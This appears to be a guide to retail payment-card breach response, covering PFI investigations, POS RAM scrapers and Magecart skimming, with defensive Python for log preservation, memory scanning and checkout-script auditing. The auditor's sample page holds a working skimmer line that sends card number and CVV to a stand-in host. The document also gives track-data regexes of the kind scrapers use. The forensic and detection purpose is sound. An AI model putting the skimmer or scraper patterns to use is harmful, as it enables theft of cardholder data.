
Retail Data Breach Response

Payment card breaches in retail trigger two parallel tracks: PCI DSS forensic investigation mandated by Visa and Mastercard, and state breach notification obligations running from the day of discovery. This guide covers both—plus POS malware forensics and Magecart skimming investigation.

How do you respond to a retail data breach?

Contain first, notify immediately, and preserve forensic evidence. The acquirer notification must happen within 24 hours of suspecting a payment card compromise—before the full scope is known. Waiting for certainty before calling the bank is the most common and costly mistake retailers make.

The first action on discovering a suspected payment card breach is isolation: disconnect affected POS terminals or payment servers from the network (pull the cable or disable the switch port) without rebooting or powering them off. Rebooting destroys volatile memory evidence: RAM that may contain card track data, encryption keys, or the malware itself, which may be memory-resident and never written to disk. If a device must be powered down, capture memory first. If the compromise is on an e-commerce site, disable or quarantine the affected JavaScript components or the entire checkout flow while preserving server logs and a copy of the page source and every script it loaded, because removing the skimmer also removes the evidence of what it did.

Preserve logs immediately. Web application logs, network firewall logs, and POS transaction logs from 90 days before the suspected compromise window are standard PFI requests. Many retailers discover their logging retention was insufficient; PCI DSS requires audit log history to be retained for at least 12 months, with at least the most recent three months immediately available for analysis, so a gap here is a compliance failure as well as a forensic one. SIEM data, if available, should be frozen and a copy taken, with hashes recorded, before any remediation actions modify it.
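A minimal way to freeze logs so the copies can later be shown to match the originals, as an added example that is not part of the original guide and not any PFI firm's tooling. It hashes each file before and after copying, makes the copy read-only, writes a JSON manifest (collector, UTC time, size, mtime, SHA-256), and can re-verify the evidence directory later. The file names, log contents and collector name are constructed for the demonstration.

```python
"""Freeze log files for a PFI request: copy them read-only into an evidence
directory and record a SHA-256 manifest for chain of custody.

Added example; file names, log lines and collector name are constructed."""
import hashlib
import json
import os
import shutil
import tempfile
import time
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 so large logs do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def preserve_logs(sources, evidence_dir: Path, collector: str) -> dict:
    """Copy each source into evidence_dir, verify the copy, and write manifest.json."""
    evidence_dir.mkdir(parents=True, exist_ok=True)
    manifest = {
        "collector": collector,
        "collected_at": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "items": [],
    }
    for src in map(Path, sources):
        src_hash = sha256_file(src)
        dst = evidence_dir / src.name
        shutil.copy2(src, dst)          # copy2 keeps the mtime the timeline depends on
        if sha256_file(dst) != src_hash:
            raise RuntimeError(f"copy of {src} does not match source")
        os.chmod(dst, 0o444)            # read-only so later remediation cannot alter it
        st = src.stat()
        manifest["items"].append({
            "source": str(src), "copy": str(dst), "size": st.st_size,
            "mtime": st.st_mtime, "sha256": src_hash,
        })
    (evidence_dir / "manifest.json").write_text(json.dumps(manifest, indent=2))
    return manifest


def verify_manifest(evidence_dir: Path) -> list:
    """Return the preserved copies whose current hash no longer matches the manifest."""
    manifest = json.loads((evidence_dir / "manifest.json").read_text())
    return [i["copy"] for i in manifest["items"]
            if sha256_file(Path(i["copy"])) != i["sha256"]]


def demo() -> tuple:
    """Constructed sample: preserve two log files, then tamper with one copy.
    Returns (items preserved, copies that fail verification after tampering)."""
    work = Path(tempfile.mkdtemp())
    logs = work / "logs"
    logs.mkdir()
    (logs / "pos-transactions.log").write_text("2025-04-02T10:15:03Z term=07 auth ok\n")
    (logs / "firewall.log").write_text("2025-04-02T10:15:04Z allow 10.1.7.22 -> 203.0.113.9:443\n")
    evidence = work / "evidence"
    manifest = preserve_logs([logs / "pos-transactions.log", logs / "firewall.log"],
                             evidence, "analyst@example")
    clean = verify_manifest(evidence)          # expected: [] right after collection
    tampered = evidence / "firewall.log"
    os.chmod(tampered, 0o644)
    tampered.write_text("")                    # simulate a remediation step clobbering the copy
    return len(manifest["items"]), len(clean), len(verify_manifest(evidence))


if __name__ == "__main__":
    print(demo())
```

Run it on the real log paths with the evidence directory on separate, write-once storage; the manifest itself should be signed or hashed into the case record so it cannot be silently regenerated.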

Call the acquiring bank within 24 hours. The acquirer is your bridge to the card brands (Visa, Mastercard, Discover, Amex). They initiate the Account Data Compromise process and, if warranted, the PFI engagement. Do not contact Visa or Mastercard directly as a merchant—the acquirer relationship is the required channel. Your acquiring bank's fraud or risk department should have a 24-hour breach notification number; confirm it before an incident occurs.

Simultaneously, engage an IR firm with retail and PCI experience and notify your cyber insurer; many policies require prompt notice and the use of panel counsel and forensics vendors as a condition of coverage, so check the policy before choosing a firm. Find IR firms specializing in retail breach response before an incident, not during one. State notification analysis should begin in parallel: you cannot wait for the PFI investigation to complete before assessing state law obligations.

What is a PCI Forensic Investigator (PFI) and when is one required?

A PCI Forensic Investigator is a forensics firm certified by the PCI Security Standards Council and approved by both Visa and Mastercard to investigate suspected cardholder data breaches. A PFI engagement is mandatory under card-brand rules when a merchant or service provider is suspected of a compromise involving payment card data.

PFIs are a distinct credential from standard QSAs (Qualified Security Assessors). The PCI SSC publishes the list of approved PFI companies; as of May 2026, approximately 27 firms hold PFI certification globally. Not every IR firm can conduct a PFI investigation—engaging an uncertified firm wastes time and money, because the card brands will require a PFI to repeat the work anyway.

The PFI is engaged by the acquirer on behalf of the card brands—not by the merchant directly. In practice, the acquirer notifies Visa and Mastercard's fraud teams, who confirm that a PFI investigation is required and may specify approved firms for the engagement. The merchant pays the PFI's fees, which typically range from $50,000 to $250,000 for a mid-size investigation, though complex multi-location investigations can exceed $500,000.

The PFI investigation has two key deliverables: a Preliminary Findings report (typically due within 5 business days of engagement) and a Final Forensic Report (typically within 10 business days of completing evidence collection). These deadlines are contractual under card-brand rules and short—meaning the PFI firm must be on-site or remote-forensics capable within days of engagement. Pre-qualifying a PFI through an IR retainer is the only reliable way to meet these timelines.

PFI investigation scope

  • Determine whether cardholder data (CHD) was accessed, acquired, or exfiltrated
  • Identify the attack vector and the full timeline of compromise
  • Confirm whether PCI DSS controls were in place at the time of the breach
  • Identify affected card numbers and the time window of exposure (used to define the compromised card population)
  • Provide remediation recommendations to prevent recurrence

How do you notify the card brands after a breach?

Acquirer notification within 24 hours of suspecting a compromise is the first mandatory step. The acquirer then manages communication to Visa's Account Data Compromise (ADC) program and to Mastercard's ADC event process, which runs under its Site Data Protection (SDP) program. Merchants do not notify card brands directly.

Visa's ADC program and Mastercard's SDP program are the card-brand frameworks governing how payment card breaches are investigated and resolved. Both programs impose financial liability on merchants and acquirers: the card brands issue fines (called "assessments") and may require the acquirer to fund card reissuance costs for compromised accounts. These assessments can run from tens of thousands to millions of dollars depending on the number of compromised accounts and the merchant's PCI compliance status at the time of breach.

A merchant that was PCI DSS compliant at the time of the breach typically faces reduced assessments—this is the core financial incentive for maintaining compliance. A merchant found non-compliant at the time of a breach faces both the full assessment and potential loss of card acceptance privileges. The PFI's determination of compliance status at breach time is therefore significant beyond the forensic findings.

The compromised card population—the set of card numbers that were potentially exposed during the confirmed window of compromise—is defined by the PFI's investigation. The card brands use this population to issue alerts to issuing banks, which decide independently whether to reissue cards. The merchant (through the acquirer) may be assessed for card reissuance costs.

What is POS malware and how is it investigated?

POS (point-of-sale) malware intercepts payment card track data from the system's memory during the authorization process—before it is encrypted for transmission. RAM scrapers harvest card numbers, expiration dates, and service codes that are momentarily in cleartext in the application's memory space.

PCI DSS prohibits storing full track data (Track 1 and Track 2) after authorization at all, and requires the PAN to be rendered unreadable wherever it is stored and encrypted when sent over open networks. But there is a brief window during authorization when this data is processed in application memory in cleartext. RAM-scraping malware targets this window, scanning memory regions used by payment applications and extracting the track data before it is encrypted or overwritten. The practical countermeasure is to remove the window entirely: with a validated point-to-point encryption (P2PE) solution the card reader encrypts track data before it reaches the POS application, so the terminal's memory never holds cleartext and a RAM scraper on it has nothing to harvest.

Historically significant POS malware families include BlackPOS (used in the 2013 Target breach, which compromised 40 million cards), Alina, JackPOS, and PoSeidon. Most current-generation POS malware uses process injection to embed in legitimate POS application processes, making detection by traditional endpoint security difficult. Forensic investigation of a POS breach typically involves memory analysis of affected terminals, review of the POS application's process list and loaded modules, and examination of network traffic logs for outbound connections to C2 infrastructure.
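To make the memory-analysis step concrete, here is an added example (not from the original guide and not any PFI firm's tool) that scans a raw memory capture for cleartext Track 1 and Track 2 data, which is exactly the pattern a RAM scraper hunts for. It applies the Luhn check so that random digit runs are discarded, and reports PANs masked to first six and last four so the findings can be shared without creating a new cardholder-data store. The sample "image" is a constructed byte string using the 4111111111111111 test PAN; run scan_image() on a real capture file read as bytes.

```python
"""Scan a memory image for magnetic-stripe track data left in cleartext.
Added example; SAMPLE_IMAGE is constructed and uses a public test PAN."""
import re

# Track 2: PAN (13-19 digits) '=' expiry YYMM, 3-digit service code,
# optional discretionary data, '?' end sentinel.
TRACK2 = re.compile(
    rb"(?<![0-9])([0-9]{13,19})=([0-9]{2}(?:0[1-9]|1[0-2]))([0-9]{3})[0-9]{0,20}\?")
# Track 1: '%B' PAN '^' name '^' expiry YYMM, service code, discretionary data, '?'.
TRACK1 = re.compile(
    rb"%B([0-9]{13,19})\^([A-Z0-9 /.'-]{2,26})\^([0-9]{2}(?:0[1-9]|1[0-2]))([0-9]{3})[^?]{0,40}\?")


def luhn_ok(pan: str) -> bool:
    """Luhn check digit validation; real PANs pass, most random digit runs do not."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(pan: str) -> str:
    """First six and last four digits, the display form PCI DSS permits."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_image(image: bytes) -> list:
    """Return one record per Luhn-valid track hit: track type, offset, masked PAN,
    expiry and service code. Offsets point at the start of the match."""
    hits = []
    for track, rx, exp_grp, svc_grp in (("track1", TRACK1, 3, 4), ("track2", TRACK2, 2, 3)):
        for m in rx.finditer(image):
            pan = m.group(1).decode()
            if not luhn_ok(pan):
                continue
            hits.append({
                "track": track,
                "offset": m.start(),
                "pan": mask(pan),
                "expiry": m.group(exp_grp).decode(),
                "service_code": m.group(svc_grp).decode(),
            })
    return hits


# Constructed memory fragment: a Track 1 record, a Track 2 record, a decoy whose
# PAN fails Luhn, and a decoy with an impossible expiry month (13).
SAMPLE_IMAGE = (
    b"\x00" * 64
    + b"POSAPP.EXE auth request "
    + b"%B4111111111111111^DOE/JOHN^2512101000000000000?"
    + b"\x00" * 32
    + b";4111111111111111=25121011234567890?"
    + b"\x00" * 16
    + b";4111111111111112=25121011234567890?"
    + b"\x00" * 16
    + b";4111111111111111=25131011234567890?"
    + b"\x00" * 16
)

if __name__ == "__main__":
    for hit in scan_image(SAMPLE_IMAGE):
        print(hit)
```

The same regexes, run over process memory of the payment application rather than a full image, are what several RAM-scraper families use internally; seeing them embedded in an unknown module loaded into the POS process is itself a strong indicator.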

POS terminals in multi-location retail environments present a particular challenge: malware may be present across hundreds or thousands of terminals, each requiring forensic imaging. PFI investigations in large retail chains often involve remote forensic collection tools that capture memory and logs across the terminal fleet without requiring physical access to each device.

What is Magecart / e-commerce skimming and how is it investigated?

Magecart attacks inject malicious JavaScript into e-commerce checkout pages to capture payment card data in real time as customers type it. The skimmer silently copies card numbers, CVVs, and billing details to attacker servers. Retailers using third-party JavaScript components—analytics, A/B testing tools, chatbots—are vulnerable to supply-chain variants where the skimmer is injected into a trusted third-party script.

The term "Magecart" originated from attacks targeting Magento-based e-commerce sites around 2015–2016. It now refers broadly to any client-side payment skimming attack, regardless of platform. Magecart groups compromised British Airways (2018, approximately 500,000 customers), Ticketmaster (2018), and Newegg (2018) through injected JavaScript on checkout pages or through compromised third-party analytics providers.

Unlike POS malware, the Magecart skimmer executes in the visitor's browser, so the merchant's server-side controls and network monitoring see nothing unusual. The malicious script captures keystrokes or form submissions on the checkout page and exfiltrates them to a domain that often mimics a legitimate analytics or CDN provider. Detection requires a Content Security Policy on the checkout page with violation reporting (report-to or report-uri) so that an unexpected script-src or connect-src is logged rather than silently blocked or allowed, subresource integrity hashes on third-party scripts (where the vendor's script is stable enough to pin), an authorized inventory of every script loaded on the payment page, and tamper detection that compares the scripts actually served against that inventory. PCI DSS v4.0 makes the last two explicit requirements (6.4.3 and 11.6.1). Reviewing loaded third-party scripts for obfuscated or anomalous code is the manual form of that comparison.

Forensic investigation of a Magecart incident involves preserving a copy of the affected page source and all loaded scripts as they were served during the incident (from web server and CDN logs, the CMS database, browser cache, or third-party archive crawls), identifying the injection point (a compromised CMS or plugin, stolen admin credentials, or a modified third-party script), and determining the exfiltration endpoint. The window of compromise, used to define the affected cardholder population, is bounded by when the malicious script was first served and when it was removed; origin and CDN logs for the script path give the first date, and file modification timestamps should be corroborated against logs rather than trusted, since they can be altered. Many retailers discover Magecart attacks through common-point-of-purchase fraud reports from card issuers rather than through their own monitoring.
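The inventory comparison described above, as an added example that is not part of the original guide and not any vendor's product. It parses the scripts a checkout page loads, flags external scripts that are not in an approved list or that lack an SRI integrity attribute, hashes inline scripts against approved hashes, and for any unapproved inline script reports the three behaviours a skimmer needs: reading the payment form, sending data to a host outside the first-party set, and encoding the payload. The approved inventory, first-party hosts, page HTML and the injected snippet (which points at a reserved .example domain) are all constructed for the demonstration.

```python
"""Diff a checkout page's scripts against an approved inventory and flag
skimmer-like inline code. Added example; inventory and page are constructed."""
import base64
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Behaviours a client-side skimmer needs; each alone is common, all three together is not.
FORM_HOOKS = re.compile(r"addEventListener\(\s*['\"](?:submit|input|keyup|keydown|change)['\"]|\.value\b")
EXFIL = re.compile(r"new\s+Image\(\)|\.src\s*=|fetch\(|XMLHttpRequest|sendBeacon|WebSocket")
ENCODING = re.compile(r"\b(?:btoa|atob|unescape|fromCharCode)\(")
URLS = re.compile(r"https?://[A-Za-z0-9.-]+")


class ScriptCollector(HTMLParser):
    """Collect every <script>: src, integrity attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._open = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._open is not None:
            self._open["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._open is not None:
            self.scripts.append(self._open)
            self._open = None


def sri_hash(script_body: bytes, algo: str = "sha384") -> str:
    """Value for a script tag's integrity attribute, for scripts stable enough to pin."""
    return f"{algo}-" + base64.b64encode(hashlib.new(algo, script_body).digest()).decode()


def audit(html: str, approved_src: set, approved_inline: set, first_party: set) -> list:
    """Return findings: unapproved or unpinned external scripts, and unapproved
    inline scripts with their skimmer indicators."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for s in p.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname
            if s["src"] not in approved_src:
                findings.append({"script": s["src"], "issue": "not in approved inventory"})
            if host not in first_party and not s["integrity"]:
                findings.append({"script": s["src"],
                                 "issue": "third-party script without SRI integrity attribute"})
            continue
        body = s["body"].strip()
        digest = hashlib.sha256(body.encode()).hexdigest()
        if digest in approved_inline:
            continue
        foreign = sorted({urlparse(u).hostname for u in URLS.findall(body)} - first_party)
        indicators = []
        if FORM_HOOKS.search(body):
            indicators.append("reads payment form input")
        if EXFIL.search(body) and foreign:
            indicators.append("sends data to " + ", ".join(foreign))
        if ENCODING.search(body):
            indicators.append("encodes payload")
        findings.append({"script": f"inline@sha256:{digest[:12]}",
                         "issue": "inline script not in approved inventory",
                         "indicators": indicators})
    return findings


# Constructed inventory: the merchant's own bundle (pinned with SRI) and one approved inline snippet.
CHECKOUT_JS = b"/* approved checkout bundle, constructed */"
APPROVED_INLINE_SRC = "window.dataLayer=window.dataLayer||[];"
FIRST_PARTY = {"www.example-store.com", "cdn.example-store.com"}
APPROVED_SRC = {"https://cdn.example-store.com/checkout.js"}
APPROVED_INLINE = {hashlib.sha256(APPROVED_INLINE_SRC.encode()).hexdigest()}

# Constructed page: approved bundle, an unapproved unpinned tag, the approved inline
# snippet, and an injected skimmer posting form values to a look-alike host.
PAGE = """<html><body>
<form id="payment"><input name="cardnumber"><input name="cvv"></form>
<script src="https://cdn.example-store.com/checkout.js" integrity="__SRI__" crossorigin="anonymous"></script>
<script src="https://analytics.example.net/tag.js"></script>
<script>window.dataLayer=window.dataLayer||[];</script>
<script>
document.getElementById('payment').addEventListener('submit',function(){var d=JSON.stringify({c:document.getElementsByName('cardnumber')[0].value,v:document.getElementsByName('cvv')[0].value});new Image().src='https://cdn-analytlcs.example/i.gif?d='+btoa(d);});
</script>
</body></html>""".replace("__SRI__", sri_hash(CHECKOUT_JS))


def demo() -> list:
    return audit(PAGE, APPROVED_SRC, APPROVED_INLINE, FIRST_PARTY)


if __name__ == "__main__":
    for f in demo():
        print(f)
```

In production the page is fetched the way a customer's browser would fetch it (with a real User-Agent and cookies, since skimmers often serve clean content to scanners), and each third-party script body is fetched and hashed as well, so that a supply-chain modification of an approved URL is caught rather than only an added tag.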

Retail breach types: vector, scope, and forensic focus

Retail breaches fall into four primary patterns. Knowing the breach type determines which forensic discipline leads, which evidence to preserve first, and which card-brand notification pathway applies.

POS RAM scraping
  Attack vector: remote access to the POS network; malware injected into the POS application process
  Data at risk: Track 1 / Track 2 data from swiped or dipped cards at in-store terminals
  Forensic focus: memory forensics on POS terminals; network traffic analysis for C2; timeline of malware installation

Magecart / JS skimmer
  Attack vector: direct CMS compromise or third-party script supply-chain injection
  Data at risk: card-not-present data (PAN, CVV, expiry, billing address) entered in the browser
  Forensic focus: page source preservation; script diff analysis; CDN and web server log review; exfiltration domain investigation

Database / e-commerce data store exfiltration
  Attack vector: SQL injection, credential compromise, or unsecured cloud storage bucket
  Data at risk: stored card data (if not tokenized), customer PII, order history
  Forensic focus: database access logs; query history; cloud access logs; data classification to confirm PCI DSS scope

Physical skimmer / card-present fraud
  Attack vector: hardware skimmer or shimmer installed on an ATM or unattended POS terminal
  Data at risk: track data and sometimes PIN from affected terminals
  Forensic focus: physical device inspection; surveillance footage review; transaction log correlation to identify the exposure window

Frequently asked questions

How do you respond to a retail data breach involving payment cards?

Isolate affected systems without rebooting, preserve forensic evidence, notify your acquiring bank within 24 hours, engage a PCI-approved PFI, and begin state notification analysis in parallel. Waiting for certainty before notifying the acquirer is the most common and costly mistake.

What is a PCI Forensic Investigator (PFI) and when is one required?

A PCI Forensic Investigator is a forensics firm approved by Visa and Mastercard to conduct mandatory investigations after suspected payment card breaches. A PFI is required under card-brand rules whenever a merchant or service provider is suspected of compromising cardholder data. The acquirer initiates the engagement; the merchant pays the fees.

What are the card-brand notification deadlines?

Notify the acquiring bank within 24 hours of suspecting a compromise. The PFI preliminary report is typically due within 5 business days of engagement; the final report within 10 business days. These deadlines are contractual under Visa ADC and Mastercard SDP program rules and cannot be extended without card-brand approval.

Does being PCI DSS compliant at the time of the breach reduce fines?

Yes. PCI DSS compliance status at the time of a breach is a key factor in card-brand assessments. Merchants who were compliant typically face reduced fines and may be eligible for assessment waivers in some programs. Non-compliant merchants face the full assessment schedule and potential suspension of card acceptance privileges.

Do retail breaches trigger state data breach notification laws?

Yes. All 50 U.S. states have breach notification laws, and payment card numbers with cardholder name trigger notification in most jurisdictions. Multi-state retailers must simultaneously analyze notification obligations in every state where affected cardholders reside. See the state notification requirements guide.

Find a retail breach specialist

PCI PFI investigations require pre-certified forensics firms. Engaging a non-approved firm means the work will need to be repeated. Find the right team before the breach.